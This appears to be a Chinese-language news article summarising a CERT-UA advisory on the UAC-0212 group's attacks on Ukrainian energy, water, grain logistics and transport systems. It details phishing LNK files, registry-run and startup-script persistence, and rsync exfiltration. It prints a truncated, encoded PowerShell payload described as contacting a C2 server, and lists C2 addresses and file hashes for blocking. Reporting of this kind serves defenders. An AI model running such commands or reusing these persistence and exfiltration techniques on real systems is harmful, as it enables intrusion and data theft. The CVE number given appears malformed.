根据乌克兰政府计算机应急响应小组(CERT-UA)最近发布的一则公告,一个被追踪为 UAC-0212 的复杂威胁组织加大了对乌克兰关键基础设施系统的攻击力度。
自 2024 年 7 月以来,这些攻击一直活跃,通过协同的供应链入侵,目标锁定在能源、供水、粮食物流和交通运输等领域。
该组织使用具有破坏性的有效载荷、先进的持久化机制以及新颖的规避技术,来扰乱工业控制系统(ICS)和运营技术(OT)。
UAC-0212 是臭名昭著的 UAC-0002(Sandworm/APT44)组织的一个分支,将传统的网络间谍活动与破坏性目标相结合。
最初的感染途径包括含有经过恶意处理的 PDF 文档的网络钓鱼邮件。这些 PDF 文件中隐藏着恶意的 LNK 文件(例如 CV_Vitaliy_Klymenko_22.11.2024.pdf.lnk),利用了 CVE-2024-382 这一严重的 Windows 漏洞,该漏洞可实现任意 PowerShell 命令的执行。
乌克兰计算机应急响应小组指出,这些文件一旦激活,会在下载诱饵文档的同时,在后台部署诸如 SECONDBEST、EMPIREPAST 和 SPARK 等模块化恶意软件。
攻击者利用像 RSYNC(例如 C:\Windows\Microsoft\Rsync\rsync.exe)这样的合法网络协议进行横向移动和数据渗出。
他们通过修改注册表(例如 HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemZ_611)和启动脚本(例如 % APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\updater.vbs)来建立持久的立足点。
攻击链条和恶意软件工具
感染链条始于一个包含混淆 PowerShell 命令的恶意 PDF 文件。例如,以下代码片段采用基于异或(XOR)的有效载荷解密方式,并连接到 62.113.238.72 以进行命令控制(C2):
powershell JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGUAbQB1AG4AZABlAG4AZwBlAHIAZABh… [truncated] JABTAHQAcgBpAG4AZwBSAGEAbgBkAG8AbQBGAG8AbABkAGUAcgAgAD0AIABHAGUAdAAtAFIAYQBuA… [truncated]
关键的有效载荷包括:
1.SECONDBEST:一个基于 GoLang 的加载器,用于部署 CROOKBAG(SHA256 哈希值:9bdf252eec4cf8a32cd92be3568e6187e80a80ecc5c528439312fb263cda8905 )。
2.EMPIREPAST:一个 DLL 侧加载器(文件名为 ssowoface.dll,SHA256 哈希值:1be7c11d50e38668e35760f32aac9f9536260d58685d3b88bcb9a276b3e0277a ),模仿合法的软件更新。
3.SPARK:一个远程访问木马(RAT),通过 TCP/443 协议与 154.222.245.165** 进行通信。
攻击目标基础设施包括乌克兰专门从事危险材料运输的物流公司和粮食存储系统。攻击者窃取工程图纸和工业控制系统的凭证,以便实施后续攻击。
乌克兰政府计算机应急响应小组敦促关键基础设施运营商对可疑的注册表项进行审计,监控 RSYNC 流量,并阻止以下的攻击指标(IOCs):
1.IP 地址:91.232.31.178,185.220.101.104,45.200.185.5
2.文件哈希值:(EMPIREPAST 的哈希值 1be7c11d50e38668e35760f32aac9f9536260d58685d3b88bcb9a276b3e0277a ),(SPARK 的哈希值 bf3b92423ec8109b38cc4b27795624b65665a1f3a6a18dab29613d4415b4aa18 )
建议各组织优先进行网络分段,并对 PowerShell 实施应用程序白名单策略。
由于 UAC-0212 会重复使用被窃取的凭证进行横向移动,乌克兰政府计算机应急响应小组建议轮换所有的管理员密码,并部署端点检测以监控异常的 LNK 文件活动。
该机构警告称,仅仅进行 “杀毒扫描” 或重新安装操作系统是不够的,因为攻击者会迅速建立备份持久化机制。
发表评论
您还未登录,请先登录。
登录